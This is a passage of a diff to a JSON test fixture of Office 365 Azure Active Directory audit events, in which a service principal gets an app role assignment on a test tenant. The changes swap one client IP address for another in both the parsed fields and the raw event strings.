"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.9571526Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622781\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"a4a12952-3467-4d48-9950-48b4b9ac87b3\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -21931,9 +21931,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-11T16:45:41", "ExtendedProperties": [ { @@ -22167,7 +22167,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.8821342Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622751\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"411fc666-cabf-4cb0-b8a3-e5a2cc515b79\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.8821342Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622751\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"411fc666-cabf-4cb0-b8a3-e5a2cc515b79\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -22197,9 +22197,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-11T16:45:41", "ExtendedProperties": [ { @@ -22433,7 +22433,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.9571526Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622781\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"a4a12952-3467-4d48-9950-48b4b9ac87b3\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"